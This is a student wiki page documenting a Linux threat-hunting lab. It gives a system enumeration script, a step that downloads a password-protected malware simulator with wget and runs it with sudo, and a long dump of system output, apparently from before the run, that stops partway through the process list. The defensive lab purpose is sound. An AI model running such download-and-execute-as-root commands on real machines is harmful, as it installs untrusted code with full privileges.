440‐Linux‐ThreatHunting‐Base - ConnorEast/Tech-Journal GitHub Wiki

finder.sh script

echo "List User Accounts"
awk -F: '{print $1}' /etc/passwd | sort
echo "-------------------------------- Networks opening"
netstat -tulwnp
echo "--------------------------------- Local Groups Information"
cat /etc/group
echo "--------------------------------- services"
systemctl list-units --type=service
echo "--------------------------------- List Processes"
ps aux
echo "--------------------------------- List files:"
ls -la /tmp
ls -la /opt
echo "--------------------------------- List Update.custom"
systemctl list-units
echo "--------------------------------- CronJob"
crontab -l
echo "--------------------------------- suid"
find / -perm -4000
echo "--------------------------------- Malicious Commands"
cat ~/.bash_history

Installing the Malware

wget https://research.cyfidant.com/thuglyfeLinux.zip
unzip thuglyfeLinux.zip  (password is: password)
cd thuglyfeLinux
sudo ./thug_simulator

Differential of Post and Prior outputs

Creation of super user

thuglyfe log file

Creation of the new Service

SSH Attack evidence

Recent access to the user accounts

.dat files

find / -name "*.dat" -type f -ctime 0 2>/dev/null

Output of finder.sh post and following execution

Prior to Execution	Post Execution
List User Accounts _apt avahi avahi-autoipd backup bin champuser colord cups-pk-helper daemon dnsmasq fwupd-refresh games gdm geoclue gnats gnome-initial-setup hplip irc kernoops list lp mail man messagebus news nm-openvpn nobody proxy pulse root rtkit saned speech-dispatcher sssd sync sys syslog systemd-network systemd-oom systemd-resolve systemd-timesync tcpdump tss usbmux uucp uuidd whoopsie www-data -------------------------------- Networks opening Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 10.0.17.48:8001 0.0.0.0:* LISTEN 721/velociraptor tcp 0 0 10.0.17.48:8003 0.0.0.0:* LISTEN 721/velociraptor tcp 0 0 10.0.17.48:8889 0.0.0.0:* LISTEN 721/velociraptor tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 381/systemd-resolve tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 645/cupsd tcp6 0 0 ::1:631 :::* LISTEN 645/cupsd tcp6 0 0 :::8000 :::* LISTEN 721/velociraptor udp 0 0 127.0.0.53:53 0.0.0.0:* 381/systemd-resolve udp 0 0 0.0.0.0:5353 0.0.0.0:* 491/avahi-daemon: r udp 0 0 0.0.0.0:51761 0.0.0.0:* 491/avahi-daemon: r udp6 0 0 :::44447 :::* 491/avahi-daemon: r udp6 0 0 :::5353 :::* 491/avahi-daemon: r raw6 0 0 :::58 :::* 7 496/NetworkManager --------------------------------- Local Groups Information root:x:0: daemon:x:1: bin:x:2: sys:x:3: adm:x:4:syslog,champuser tty:x:5: disk:x:6: lp:x:7: mail:x:8: news:x:9: uucp:x:10: man:x:12: proxy:x:13: kmem:x:15: dialout:x:20: fax:x:21: voice:x:22: cdrom:x:24:champuser floppy:x:25: tape:x:26: sudo:x:27:champuser audio:x:29:pulse dip:x:30:champuser www-data:x:33: backup:x:34: operator:x:37: list:x:38: irc:x:39: src:x:40: gnats:x:41: shadow:x:42: utmp:x:43: video:x:44: sasl:x:45: plugdev:x:46:champuser staff:x:50: games:x:60: users:x:100: nogroup:x:65534: systemd-journal:x:101: systemd-network:x:102: systemd-resolve:x:103: crontab:x:104: messagebus:x:105: systemd-timesync:x:106: input:x:107: sgx:x:108: kvm:x:109: render:x:110: syslog:x:111: _ssh:x:112: tss:x:113: bluetooth:x:114: ssl-cert:x:115: uuidd:x:116: systemd-oom:x:117: tcpdump:x:118: avahi-autoipd:x:119: netdev:x:120: avahi:x:121: lpadmin:x:122:champuser rtkit:x:123: whoopsie:x:124: sssd:x:125: fwupd-refresh:x:126: nm-openvpn:x:127: scanner:x:128:saned saned:x:129: colord:x:130: geoclue:x:131: pulse:x:132: pulse-access:x:133: gdm:x:134: lxd:x:135:champuser champuser:x:1000: sambashare:x:136:champuser --------------------------------- services UNIT LOAD ACTIVE SUB DESCRIPTION accounts-daemon.service loaded active running Accounts Service acpid.service loaded active running ACPI event daemon apparmor.service loaded active exited Load AppArmor profiles apport.service loaded active exited LSB: automatic crash report generation auditd.service loaded active running Security Auditing Service avahi-daemon.service loaded active running Avahi mDNS/DNS-SD Stack colord.service loaded active running Manage, Install and Generate Color Profiles console-setup.service loaded active exited Set console font and keymap cron.service loaded active running Regular background program processing daemon cups-browsed.service loaded active running Make remote CUPS printers available locally cups.service loaded active running CUPS Scheduler dbus.service loaded active running D-Bus System Message Bus gdm.service loaded active running GNOME Display Manager irqbalance.service loaded active running irqbalance daemon kerneloops.service loaded active running Tool to automatically collect and submit kernel crash signatures keyboard-setup.service loaded active exited Set the console keyboard layout kmod-static-nodes.service loaded active exited Create List of Static Device Nodes ModemManager.service loaded active running Modem Manager networkd-dispatcher.service loaded active running Dispatcher daemon for systemd-networkd NetworkManager-wait-online.service loaded active exited Network Manager Wait Online NetworkManager.service loaded active running Network Manager openvpn.service loaded active exited OpenVPN service packagekit.service loaded active running PackageKit Daemon plymouth-quit-wait.service loaded active exited Hold until boot process finishes up plymouth-read-write.service loaded active exited Tell Plymouth To Write Out Runtime Data plymouth-start.service loaded active exited Show Plymouth Boot Screen podman-restart.service loaded active exited Podman Start All Containers With Restart Policy Set To Always polkit.service loaded active running Authorization Manager power-profiles-daemon.service loaded active running Power Profiles daemon rsyslog.service loaded active running System Logging Service rtkit-daemon.service loaded active running RealtimeKit Scheduling Policy Service setvtrgb.service loaded active exited Set console scheme snapd.apparmor.service loaded active exited Load AppArmor profiles managed internally by snapd snapd.seeded.service loaded active exited Wait until snapd is fully seeded snapd.service loaded active running Snap Daemon switcheroo-control.service loaded active running Switcheroo Control Proxy service systemd-binfmt.service loaded active exited Set Up Additional Binary Formats systemd-fsck@dev-disk-by\x2duuid-4015\x2d7165.service loaded active exited File System Check on /dev/disk/by-uuid/4015-7165 systemd-journal-flush.service loaded active exited Flush Journal to Persistent Storage systemd-journald.service loaded active running Journal Service systemd-logind.service loaded active running User Login Management systemd-modules-load.service loaded active exited Load Kernel Modules systemd-oomd.service loaded active running Userspace Out-Of-Memory (OOM) Killer systemd-random-seed.service loaded active exited Load/Save Random Seed systemd-remount-fs.service loaded active exited Remount Root and Kernel File Systems systemd-resolved.service loaded active running Network Name Resolution systemd-sysctl.service loaded active exited Apply Kernel Variables systemd-sysusers.service loaded active exited Create System Users systemd-timesyncd.service loaded active running Network Time Synchronization systemd-tmpfiles-setup-dev.service loaded active exited Create Static Device Nodes in /dev systemd-tmpfiles-setup.service loaded active exited Create Volatile Files and Directories systemd-udev-trigger.service loaded active exited Coldplug All udev Devices systemd-udevd.service loaded active running Rule-based Manager for Device Events and Files systemd-update-utmp.service loaded active exited Record System Boot/Shutdown in UTMP systemd-user-sessions.service loaded active exited Permit User Sessions udisks2.service loaded active running Disk Manager ufw.service loaded active exited Uncomplicated firewall unattended-upgrades.service loaded active running Unattended Upgrades Shutdown upower.service loaded active running Daemon for power management [email protected] loaded active exited User Runtime Directory /run/user/1000 [email protected] loaded active running User Manager for UID 1000 velociraptor.service loaded active running Velociraprot linux amd64 wpa_supplicant.service loaded active running WPA supplicant LOAD = Reflects whether the unit definition was properly loaded. ACTIVE = The high-level unit activation state, i.e. generalization of SUB. SUB = The low-level unit activation state, values depend on unit type. 63 loaded units listed. Pass --all to see loaded but inactive units, too. To show all installed unit files use 'systemctl list-unit-files'. --------------------------------- List Processes USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.2 167888 13008 ? Ss 11:08 0:07 /sbin/init splash root 2 0.0 0.0 0 0 ? S 11:08 0:00 [kthreadd] root 3 0.0 0.0 0 0 ? S 11:08 0:00 [pool_workqueue_release] root 4 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-rcu_g] root 5 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-rcu_p] root 6 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-slub_] root 7 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-netns] root 10 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/0:0H-events_highpri] root 12 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-mm_pe] root 13 0.0 0.0 0 0 ? I 11:08 0:00 [rcu_tasks_kthread] root 14 0.0 0.0 0 0 ? I 11:08 0:00 [rcu_tasks_rude_kthread] root 15 0.0 0.0 0 0 ? I 11:08 0:00 [rcu_tasks_trace_kthread] root 16 0.0 0.0 0 0 ? S 11:08 0:00 [ksoftirqd/0] root 17 0.0 0.0 0 0 ? I 11:08 0:04 [rcu_preempt] root 18 0.0 0.0 0 0 ? S 11:08 0:00 [migration/0] root 19 0.0 0.0 0 0 ? S 11:08 0:00 [idle_inject/0] root 20 0.0 0.0 0 0 ? S 11:08 0:00 [cpuhp/0] root 21 0.0 0.0 0 0 ? S 11:08 0:00 [cpuhp/1] root 22 0.0 0.0 0 0 ? S 11:08 0:00 [idle_inject/1] root 23 0.0 0.0 0 0 ? S 11:08 0:00 [migration/1] root 24 0.0 0.0 0 0 ? S 11:08 0:00 [ksoftirqd/1] root 26 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/1:0H-events_highpri] root 29 0.0 0.0 0 0 ? S 11:08 0:00 [kdevtmpfs] root 30 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-inet_] root 31 0.6 0.0 0 0 ? S 11:08 3:21 [kauditd] root 32 0.0 0.0 0 0 ? S 11:08 0:00 [khungtaskd] root 33 0.0 0.0 0 0 ? S 11:08 0:00 [oom_reaper] root 35 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-write] root 36 0.0 0.0 0 0 ? S 11:08 0:04 [kcompactd0] root 38 0.0 0.0 0 0 ? SN 11:08 0:00 [ksmd] root 39 0.0 0.0 0 0 ? SN 11:08 0:00 [khugepaged] root 40 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-kinte] root 41 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-kbloc] root 42 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-blkcg] root 43 0.0 0.0 0 0 ? S 11:08 0:00 [irq/9-acpi] root 44 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-tpm_d] root 45 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-ata_s] root 46 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-md] root 47 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-md_bi] root 48 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-edac-] root 49 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-devfr] root 50 0.0 0.0 0 0 ? S 11:08 0:00 [watchdogd] root 51 0.0 0.0 0 0 ? I< 11:08 0:11 [kworker/0:1H-kblockd] root 52 0.0 0.0 0 0 ? S 11:08 0:03 [kswapd0] root 53 0.0 0.0 0 0 ? S 11:08 0:00 [ecryptfs-kthread] root 55 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-kthro] root 56 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-acpi_] root 57 0.0 0.0 0 0 ? S 11:08 0:00 [scsi_eh_0] root 58 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-scsi_] root 59 0.0 0.0 0 0 ? S 11:08 0:00 [scsi_eh_1] root 60 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-scsi_] root 61 0.0 0.0 0 0 ? S 11:08 0:00 [scsi_eh_2] root 62 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-scsi_] root 66 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-mld] root 67 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-ipv6_] root 76 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-kstrp] root 78 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/u7:0] root 79 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/u8:0] root 80 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/u9:0] root 94 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-charg] root 113 0.0 0.0 0 0 ? I< 11:08 0:11 [kworker/1:1H-kblockd] root 146 0.0 0.0 0 0 ? I 11:08 0:12 [kworker/u4:1-ext4-rsv-conversion] root 181 0.1 0.0 0 0 ? S 11:08 0:38 [jbd2/sda3-8] root 182 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-ext4-] root 221 0.1 5.3 469244 323656 ? S<s 11:09 0:50 /lib/systemd/systemd-journald root 253 0.0 0.1 26888 6992 ? Ss 11:09 0:00 /lib/systemd/systemd-udevd root 306 0.0 0.0 0 0 ? I< 11:09 0:00 [kworker/R-ttm] root 308 0.0 0.0 0 0 ? I< 11:09 0:00 [kworker/R-crypt] systemd+ 378 0.1 0.1 14836 6528 ? Ss 11:09 0:48 /lib/systemd/systemd-oomd systemd+ 381 0.0 0.2 26464 14192 ? Ss 11:09 0:01 /lib/systemd/systemd-resolved systemd+ 385 0.0 0.1 89388 7040 ? Ssl 11:09 0:00 /lib/systemd/systemd-timesyncd root 391 2.3 0.0 11872 2692 ? S<sl 11:09 12:34 /sbin/auditd root 424 0.0 0.0 0 0 ? S 11:09 0:00 [audit_prune_tree] root 487 0.0 0.1 239908 7608 ? Ssl 11:09 0:01 /usr/libexec/accounts-daemon root 488 0.0 0.0 2816 1920 ? Ss 11:09 0:00 /usr/sbin/acpid avahi 491 0.0 0.0 7632 3712 ? Ss 11:09 0:01 avahi-daemon: running [ubuntu-28.local] root 493 0.0 0.0 9496 2688 ? Ss 11:09 0:00 /usr/sbin/cron -f -P message+ 494 0.0 0.1 11120 6656 ? Ss 11:09 0:02 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only root 496 0.0 0.3 261108 18496 ? Ssl 11:09 0:03 /usr/sbin/NetworkManager --no-daemon root 502 0.0 0.0 82768 3712 ? Ssl 11:09 0:01 /usr/sbin/irqbalance --foreground root 506 0.0 0.3 41200 21248 ? Ss 11:09 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers root 508 0.0 0.1 243096 11152 ? Ssl 11:09 0:02 /usr/libexec/polkitd --no-debug root 509 0.0 0.1 240068 7040 ? Ssl 11:09 0:00 /usr/libexec/power-profiles-daemon syslog 511 0.0 0.0 222404 5248 ? Ssl 11:09 0:00 /usr/sbin/rsyslogd -n -iNONE root 515 0.0 0.6 1849620 39012 ? Ssl 11:09 0:05 /usr/lib/snapd/snapd root 517 0.0 0.1 236380 6400 ? Ssl 11:09 0:00 /usr/libexec/switcheroo-control root 522 0.0 0.1 15400 7672 ? Ss 11:09 0:00 /lib/systemd/systemd-logind root 525 0.0 0.2 393080 12376 ? Ssl 11:09 0:00 /usr/libexec/udisks2/udisksd root 528 0.0 0.1 16504 6144 ? Ss 11:09 0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant avahi 551 0.0 0.0 7444 1408 ? S 11:09 0:00 avahi-daemon: chroot helper root 580 0.0 0.1 317972 11832 ? Ssl 11:09 0:00 /usr/sbin/ModemManager root 593 0.0 1.0 6166548 61752 ? Ssl 11:09 0:13 /usr/local/bin/velociraptor --config /root/server.config.yaml frontend -v root 614 0.0 0.3 118192 23168 ? Ssl 11:09 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal root 641 0.0 0.1 241344 9088 ? Ssl 11:09 0:00 /usr/sbin/gdm3 root 645 0.0 0.1 73028 12032 ? Ss 11:09 0:00 /usr/sbin/cupsd -l root 691 0.0 0.1 172068 10624 ? Ssl 11:09 0:00 /usr/sbin/cups-browsed kernoops 707 0.0 0.0 13092 2456 ? Ss 11:09 0:00 /usr/sbin/kerneloops --test kernoops 712 0.0 0.0 13092 2324 ? Ss 11:09 0:00 /usr/sbin/kerneloops root 721 0.2 1.4 6168788 90684 ? Sl 11:09 1:24 /usr/local/bin/velociraptor --config /root/server.config.yaml frontend -v rtkit 745 0.0 0.0 154004 3328 ? SNsl 11:09 0:00 /usr/libexec/rtkit-daemon root 968 0.0 0.1 242228 8448 ? Ssl 11:09 0:00 /usr/libexec/upowerd root 974 0.0 0.3 298380 18620 ? Ssl 11:09 0:00 /usr/libexec/packagekitd colord 1109 0.0 0.2 245376 12536 ? Ssl 11:09 0:00 /usr/libexec/colord root 1169 0.0 0.1 391920 11316 ? Sl 11:09 0:00 gdm-session-worker [pam/gdm-password] champus+ 1173 0.0 0.1 17984 10368 ? Ss 11:09 0:02 /lib/systemd/systemd --user champus+ 1174 0.0 0.0 169964 5340 ? S 11:09 0:00 (sd-pam) champus+ 1180 0.0 0.0 39568 4864 ? S<sl 11:09 0:00 /usr/bin/pipewire champus+ 1181 0.0 0.0 23456 4864 ? Ssl 11:09 0:00 /usr/bin/pipewire-media-session champus+ 1182 0.0 0.3 2132512 19172 ? S<sl 11:09 0:00 /usr/bin/pulseaudio --daemonize=no --log-target=journal champus+ 1193 0.0 0.1 240892 6812 ? Sl 11:09 0:00 /usr/bin/gnome-keyring-daemon --daemonize --login champus+ 1201 0.0 0.1 162432 6144 tty2 Ssl+ 11:09 0:00 /usr/libexec/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --session=ubuntu champus+ 1203 0.2 1.6 655052 99396 tty2 Sl+ 11:09 1:19 /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /run/user/1000/gdm/Xauthority -nolisten tcp -background none -noreset -keeptty -novtswitch -verbose 3 champus+ 1214 0.0 0.1 10320 6528 ? Ss 11:09 0:02 /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only champus+ 1215 0.0 0.1 612836 7552 ? Ssl 11:09 0:00 /usr/libexec/xdg-document-portal champus+ 1218 0.0 0.1 236156 6272 ? Ssl 11:09 0:00 /usr/libexec/xdg-permission-store root 1224 0.0 0.0 2796 1792 ? Ss 11:09 0:00 fusermount3 -o rw,nosuid,nodev,fsname=portal,auto_unmount,subtype=portal -- /run/user/1000/doc champus+ 1252 0.0 0.2 223044 13440 tty2 Sl+ 11:09 0:00 /usr/libexec/gnome-session-binary --session=ubuntu champus+ 1341 0.0 0.1 309728 7936 ? Ssl 11:09 0:00 /usr/libexec/at-spi-bus-launcher champus+ 1347 0.0 0.0 8564 4480 ? S 11:09 0:00 /usr/bin/dbus-daemon --config-file=/usr/share/defaults/at-spi2/accessibility.conf --nofork --print-address 11 --address=unix:path=/run/user/1000/at-spi/bus_1 champus+ 1390 0.0 0.0 91912 5120 ? Ssl 11:09 0:00 /usr/libexec/gnome-session-ctl --monitor champus+ 1406 0.0 0.1 240648 7808 ? Ssl 11:09 0:00 /usr/libexec/gvfsd champus+ 1418 0.0 0.1 380896 6656 ? Sl 11:09 0:00 /usr/libexec/gvfsd-fuse /run/user/1000/gvfs -f champus+ 1423 0.0 0.2 519128 15232 ? Ssl 11:09 0:00 /usr/libexec/gnome-session-binary --systemd-service --session=ubuntu champus+ 1468 1.4 5.0 4242500 305728 ? Ssl 11:09 7:26 /usr/bin/gnome-shell champus+ 1516 0.0 0.3 583040 19584 ? Sl 11:09 0:00 /usr/libexec/gnome-shell-calendar-server champus+ 1522 0.0 0.3 1072140 23296 ? Ssl 11:09 0:00 /usr/libexec/evolution-source-registry champus+ 1530 0.0 0.5 597216 35584 ? Sl 11:09 0:00 /usr/libexec/goa-daemon champus+ 1533 0.0 0.4 840468 27264 ? Ssl 11:09 0:00 /usr/libexec/evolution-calendar-factory champus+ 1542 0.0 0.2 338404 13696 ? Sl 11:09 0:00 /usr/libexec/goa-identity-service champus+ 1543 0.0 0.1 315892 10112 ? Ssl 11:09 0:00 /usr/libexec/gvfs-udisks2-volume-monitor champus+ 1553 0.0 0.1 315212 7680 ? Ssl 11:09 0:02 /usr/libexec/gvfs-afc-volume-monitor champus+ 1561 0.0 0.1 236460 6528 ? Ssl 11:09 0:00 /usr/libexec/gvfs-mtp-volume-monitor champus+ 1563 0.0 0.0 156940 5888 ? Ssl 11:09 0:00 /usr/libexec/dconf-service champus+ 1572 0.0 0.4 672364 26880 ? Ssl 11:09 0:00 /usr/libexec/evolution-addressbook-factory champus+ 1573 0.0 0.1 236636 6656 ? Ssl 11:09 0:00 /usr/libexec/gvfs-goa-volume-monitor champus+ 1577 0.0 0.1 237416 6912 ? Ssl 11:09 0:00 /usr/libexec/gvfs-gphoto2-volume-monitor champus+ 1594 0.0 0.1 314868 8832 ? Sl 11:09 0:00 /usr/libexec/gvfsd-trash --spawner :1.19 /org/gtk/gvfs/exec_spaw/0 champus+ 1603 0.0 0.4 2599500 26372 ? Sl 11:09 0:00 /usr/bin/gjs /usr/share/gnome-shell/org.gnome.Shell.Notifications champus+ 1606 0.0 0.1 162756 7808 ? Sl 11:09 0:00 /usr/libexec/at-spi2-registryd --use-gnome-session champus+ 1618 0.0 0.0 2892 1664 ? Ss 11:09 0:00 sh -c /usr/bin/ibus-daemon --panel disable $([ "$XDG_SESSION_TYPE" = "x11" ] && echo "--xim") champus+ 1619 0.0 0.1 310392 6656 ? Ssl 11:09 0:00 /usr/libexec/gsd-a11y-settings champus+ 1622 0.0 0.1 315500 11812 ? Sl 11:09 0:18 /usr/bin/ibus-daemon --panel disable --xim champus+ 1624 0.0 0.4 537204 25316 ? Ssl 11:09 0:00 /usr/libexec/gsd-color champus+ 1630 0.0 0.2 375436 13568 ? Ssl 11:09 0:00 /usr/libexec/gsd-datetime champus+ 1633 0.0 0.1 312080 7936 ? Ssl 11:09 0:01 /usr/libexec/gsd-housekeeping champus+ 1634 0.0 0.3 341424 22508 ? Ssl 11:09 0:00 /usr/libexec/gsd-keyboard champus+ 1638 0.0 0.4 717624 25796 ? Ssl 11:09 0:00 /usr/libexec/gsd-media-keys champus+ 1640 0.0 0.4 525040 24312 ? Ssl 11:09 0:00 /usr/libexec/gsd-power champus+ 1642 0.0 0.1 249872 10752 ? Ssl 11:09 0:00 /usr/libexec/gsd-print-notifications champus+ 1643 0.0 0.1 232272 7552 ? Sl 11:09 0:00 /usr/libexec/gsd-disk-utility-notify champus+ 1644 0.0 0.1 457856 6656 ? Ssl 11:09 0:00 /usr/libexec/gsd-rfkill champus+ 1646 0.0 0.1 236292 6272 ? Ssl 11:09 0:00 /usr/libexec/gsd-screensaver-proxy champus+ 1649 0.0 0.1 465780 9344 ? Ssl 11:09 0:00 /usr/libexec/gsd-sharing champus+ 1654 0.0 0.1 312272 7552 ? Ssl 11:09 0:00 /usr/libexec/gsd-smartcard champus+ 1657 0.0 0.9 762828 60304 ? Sl 11:09 0:00 /usr/libexec/evolution-data-server/evolution-alarm-notify champus+ 1661 0.0 0.1 319312 8704 ? Ssl 11:09 0:00 /usr/libexec/gsd-sound champus+ 1665 0.0 0.3 268020 22548 ? Ssl 11:09 0:00 /usr/libexec/gsd-wacom champus+ 1674 0.0 0.3 343292 23932 ? Ssl 11:09 0:00 /usr/libexec/gsd-xsettings champus+ 1693 0.0 0.1 237312 7296 ? Sl 11:09 0:00 /usr/libexec/ibus-dconf champus+ 1695 0.0 0.4 272488 28020 ? Sl 11:09 0:03 /usr/libexec/ibus-extension-gtk3 champus+ 1701 0.0 0.3 194160 22968 ? Sl 11:09 0:00 /usr/libexec/ibus-x11 --kill-daemon champus+ 1706 0.0 0.1 237264 7424 ? Sl 11:09 0:00 /usr/libexec/ibus-portal champus+ 1723 0.0 0.2 342364 14208 ? Sl 11:09 0:00 /usr/libexec/gsd-printer champus+ 1733 0.0 0.0 39136 4224 ? Ss 11:09 0:00 /snap/snapd-desktop-integration/315/usr/bin/snapd-desktop-integration champus+ 1745 0.0 0.1 623772 11904 ? Ssl 11:09 0:01 /usr/libexec/xdg-desktop-portal champus+ 1765 0.0 1.2 1395884 73560 ? Ssl 11:09 0:02 /usr/libexec/xdg-desktop-portal-gnome champus+ 1851 0.0 0.4 2534008 26908 ? Sl 11:09 0:00 /usr/bin/gjs /usr/share/gnome-shell/org.gnome.ScreenSaver champus+ 1855 0.0 1.1 915040 71320 ? Sl 11:09 0:00 /snap/snapd-desktop-integration/315/usr/bin/snapd-desktop-integration champus+ 1874 0.0 0.1 163612 7424 ? Sl 11:09 0:06 /usr/libexec/ibus-engine-simple champus+ 1875 0.0 0.5 719576 35448 ? SNsl 11:09 0:01 /usr/libexec/tracker-miner-fs-3 champus+ 1926 0.0 0.3 342028 22784 ? Ssl 11:09 0:00 /usr/libexec/xdg-desktop-portal-gtk champus+ 1962 0.0 0.1 163048 6400 ? Ssl 11:09 0:00 /usr/libexec/gvfsd-metadata champus+ 1997 0.0 0.5 537936 36096 ? Sl 11:10 0:02 update-notifier champus+ 3887 0.0 0.0 41316 2944 ? S 11:16 0:00 podman champus+ 9538 0.0 1.0 1203740 64236 ? Sl 11:40 0:05 /usr/bin/nautilus --gapplication-service champus+ 9568 3.6 14.3 12403380 870936 ? Sl 11:42 17:46 /snap/firefox/7177/usr/lib/firefox/firefox champus+ 9638 0.0 0.0 21072 2464 ? Sl 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/crashhelper 9568 9 /tmp/ 11 champus+ 9701 0.0 0.4 299784 27520 ? S 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -ipcHandle 0 -signalPipe 1 -initialChannelId {54ef713b-a611-4e84-9f06-df63f5debaf4} -parentPid 9568 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 1 forkserver champus+ 9704 0.0 0.5 314180 36268 ? Sl 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -parentBuildID 20251028100515 -prefsHandle 0:35969 -prefMapHandle 1:275119 -sandboxReporter 2 -chrootClient 3 -ipcHandle 4 -initialChannelId {232c0fd9-eff3-428d-9663-2763ef6a6ffb} -parentPid 9568 -crashReporter 5 -crashHelper 6 -appDir /snap/firefox/7177/usr/lib/firefox/browser 2 socket champus+ 9732 1.7 3.1 2538744 188336 ? Sl 11:42 8:26 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:36141 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {2f719dbf-acd1-40e7-9c1f-45b26d269367} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 3 tab champus+ 9743 0.0 0.6 447228 41132 ? Sl 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -parentBuildID 20251028100515 -prefsHandle 0:36141 -prefMapHandle 1:275119 -sandboxReporter 2 -chrootClient 3 -ipcHandle 4 -initialChannelId {83a6878e-195a-47e0-aa3f-fe4a5dfe3b7b} -parentPid 9568 -crashReporter 5 -crashHelper 6 -appDir /snap/firefox/7177/usr/lib/firefox/browser 4 rdd champus+ 9780 0.0 0.2 1765940 17792 ? Sl 11:42 0:01 /usr/bin/snap userd champus+ 9938 0.0 1.4 2465008 87996 ? Sl 11:42 0:01 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:45757 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {0e618765-94ab-4adb-96ee-e57c09db7d36} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 5 tab champus+ 10235 0.0 0.7 451848 47280 ? Sl 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -parentBuildID 20251028100515 -sandboxingKind 0 -prefsHandle 0:46927 -prefMapHandle 1:275119 -sandboxReporter 2 -chrootClient 3 -ipcHandle 4 -initialChannelId {4c7ee706-7853-4c03-b832-7098687275bf} -parentPid 9568 -crashReporter 5 -crashHelper 6 -appDir /snap/firefox/7177/usr/lib/firefox/browser 6 utility champus+ 10244 1.2 11.7 3234416 715124 ? Sl 11:42 6:03 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43481 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {22da36fa-b041-4214-bca0-96970a908d65} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 7 tab champus+ 10451 0.2 1.3 2454436 83724 ? Sl 11:42 1:07 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43670 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {0846778f-6aeb-4339-8fc9-4ab5f998a29e} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 10 tab champus+ 10653 0.0 0.1 388688 8704 ? Sl 11:43 0:00 /usr/libexec/gvfsd-network --spawner :1.19 /org/gtk/gvfs/exec_spaw/1 champus+ 10667 0.0 0.1 316828 8576 ? Sl 11:43 0:00 /usr/libexec/gvfsd-dnssd --spawner :1.19 